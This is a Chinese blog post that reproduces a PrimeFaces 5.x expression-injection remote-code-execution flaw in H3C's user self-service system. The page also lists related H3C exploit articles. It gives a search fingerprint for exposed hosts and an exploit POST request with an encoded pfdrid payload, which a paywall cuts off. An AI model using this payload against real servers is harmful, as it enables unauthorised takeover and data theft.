H3C用户自助服务系统存在primefaces5.x表达式注入漏洞

最新推荐文章于 2024-05-16 17:12:22 发布
最新推荐文章于 2024-05-16 17:12:22 发布
阅读量162 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/136605944
版权
本文介绍了H3C用户自助服务系统中发现的primefaces5.x表达式注入漏洞,该漏洞可能导致攻击者获取webshell,控制服务器并读取敏感信息。复现步骤包括在特定环境下的漏洞利用方法。
摘要由CSDN通过智能技术生成

漏洞描述

H3C用户自助服务系统存在primefaces5.x表达式注入漏洞,攻击者可以获取 webshell,控制服务器权限,读取敏感信息等。

漏洞环境

fid=”tPmVs5PL6e9m5Xt0J4V2+A==”

漏洞复现

POC

POST /mselfservice/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)
Host: 

pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJ
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
漏洞复现】H3C IMC智能管理中心命令执行漏洞
晚风不及你
02-18 1893
H3C IMC(Intlligent Management Center)智能管理中心是H3C推出的下一代业务只能管理产品。
H3C iMC智能管理中心 远程代码执行漏洞复现(XVE-2024-4567)
最新发布
0xSec
08-07 617
H3C iMC智能管理中心 /byod/index.xhtml、/selfservice/login.jsf、/rpt/reportpage/loginrpt.jsf等多个接口处存在远程代码执行漏洞,未经身份攻击者可通过该漏洞服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。该漏洞利用难度较低,建议受影响的用户尽快修复。
H3C iMC 存在远程命令执行漏洞
nnn2188185的博客
04-22 3645
H3C Intelligent Management Center(以下简称 H3C iMC)是一款业务智能管理平台。 H3C Intelligent Management Center 存在命令执行漏洞。攻击者可利用漏洞通过构造特殊的请求造成远程命令执行。
H3C多系列路由器存在前台RCE漏洞(含批量验证poc)
2401_84264583的博客
05-16 460
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。(1)payload利用地址:/goform/aspForm。H3C多系列路由器存在前台RCE漏洞。因篇幅有限,仅展示部分资料。
H3C任意命令执行漏洞
战神/calmness的博客
05-23 9436
H3C漏洞 目录 简述 过程 修复建议 参考链接 简述 H3C iMC智能管理中心 云计算(cloud computing):“云计算是一种计算模式,利用互联网技术把大量可扩展和弹性的IT相关能力作为一种服务提供给多个用户(Gartner)”。提供资源的网络被称为“云”。“云”中的资源在使用者看来是可以无限扩展的,并且可以随时获取,按需使用,随时扩展,这使得应用提供者无需为繁琐的细节而烦恼,能够更加专注于自己的业务,有利于创新和降低成本。 过程 body="iMC来宾接入自助管理..
漏洞复现】H3C-用户自助服务平台-imc-远程命令执行
知黑而守白
03-12 335
H3C用户自助服务平台是一种基于云计算和自动化技术的管理平台,旨在提供自助式、智能化的网络设备和服务管理解决方案。该平台通过集成多种功能和工具,帮助企业用户更高效地管理和维护其网络设备,并提供更好的用户体验。H3C用户自助服务平台 imc 接口存在一个命令执行漏洞,使得攻击者可以通过构造特定的请求远程执行恶意代码。此漏洞可能导致攻击者获取系统权限、执行任意命令,严重威胁系统的机密性和完整性。
H3C IMC 远程命令执行漏洞
weixin_43567873的博客
03-10 71
H3C IMC 远程命令执行漏洞
primefaces 4.x升級5.x 錯誤 排除 isTransformMetadataEnabled()Z1
08-08
本篇文章将详细介绍在从Primefaces 4.x升级到5.x时出现的"java.lang.NoSuchMethodError: org.primefaces.config.ConfigContainer.isTransformMetadataEnabled()Z"错误的原因以及解决方法。 **错误原因** 这个错误...
Primefaces 3.0.x Upgrade 注意事項1
08-08
- `JAVA:org.primefaces.component.datatable.DataTable.setPage` API已被移除。在AlarmController和NewsController中如果使用了这个方法,需要进行相应的代码调整以适应新的API。可能需要转向使用其他方法来实现...
Primefaces 3.1.x Upgrade 注意事項1
08-08
在升级到Primefaces 3.1.x的过程中,开发者可能会遇到一些关键的问题,这些问题是由于新的版本遵循了JSF规范导致的。本文将详细介绍这些问题以及如何解决它们,以便顺利完成升级。 首先,升级到Primefaces 3.1.x时...
PrimeFaces Extensions.zip
12-29
PrimeFaces Extensions是一个基于Java和JavaEE的开源UI框架,它扩展了流行的PrimeFaces库,提供了更多的组件、功能和样式,以增强Web应用的用户界面。这个"PrimeFaces Extensions.zip"文件很可能包含了PrimeFaces ...
Spring3.X+JPA+JSF2+Primefaces
05-14
系统是基于Spring3X+JPA+JSF2+Primefaces等技术的模板,其中还使用了 SpringMVC 和 SpringSecurity3,希望可以帮到那些想了解JSF2 、Primefaces 和SpringSecurity的朋友,谢谢!
漏洞复现】H3C路由器信息泄露任意用户登录
失心少年
09-06 2643
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!1.利用GET发送如下请求包,获取管理员账号密码(ER3100 根据web界面的标题修改)通过访问特地址得到密码可进行登录。
漏洞复现 || H3C iMC 存在远程命令执行
失心少年
07-07 989
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!H3C Intelligent Management Center(以下简称 H3C iMC)是一款业务智能管理平台。攻击者可利用漏洞通过构造特殊的请求造成远程命令执行。
2024年网络安全山东省赛-SMB信息收集解析(中职组)_使用访问工具对服务服务访问,将服务器中管理员桌面的文本文档里的内容作为 flag
2401_84252281的博客
04-26 826
任务环境说明:服务器场景:Server1。
漏洞复现-H3C系列
aming小老弟
03-15 931
H3C用户自助服务平台是一种基于云计算和自动化技术的管理平台,旨在提供自助式、智能化的网络设备和服务管理解决方案。该平台通过集成多种功能和工具,帮助企业用户更高效地管理和维护其网络设备,并提供更好的用户体验。H3C用户自助服务平台dynamiccontent.properties.xhtml接口处存在命令执行漏洞,未经身份验证的攻击者可以利用此漏洞执行任意指令,写入后门文件,导致整个web服务存在被控的风险。
思科集成管理控制器IMC爆出任意代码执行漏洞CVE-2017-6616 绿盟科技发布安全威胁通告...
weixin_33910137的博客
09-01 387
当地时间2017年4月19日(北京时间2017年4月20日),思科(Cisco)官方发布一条安全公告,公告显示思科集成管理控制器(Integrated Management Controller)IMC的基于Web的GUI中的漏洞(CVE-2017-6616)允许经过身份验证的远程攻击者,在受影响的系统上执行任意代码。 该漏洞是由于受影响的软件没有充分过...
H3C 用户自助服务平台 dynamiccontent.properties.xhtml RCE漏洞复现
0xSec
03-11 669
H3C 用户自助服务平台 dynamiccontent.properties.xhtml 接口出存在命令执行漏洞,未经身份验证的攻击者可以利用此漏洞执行任意指令,写入后门文件,导致整个web服务存在被控的风险。
H3C IMC 命令执行 Poc
soldi_er的博客
07-29 2766
文章目录漏洞复现漏洞描述FOFA搜索测试编写Poc脚本 漏洞复现 漏洞描述   H3C IMC dynamiccontent.properties.xhtm 存在远程命令执行,攻击者通过构造特殊的请求造成远程命令执行。 FOFA搜索   “/imc/login.jsf” && body="/imc/javax.faces.resource/images/login_help.png.jsf?ln=primefaces-imc-new-webui" 测试   打开搜索结果第一个,页面如图。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值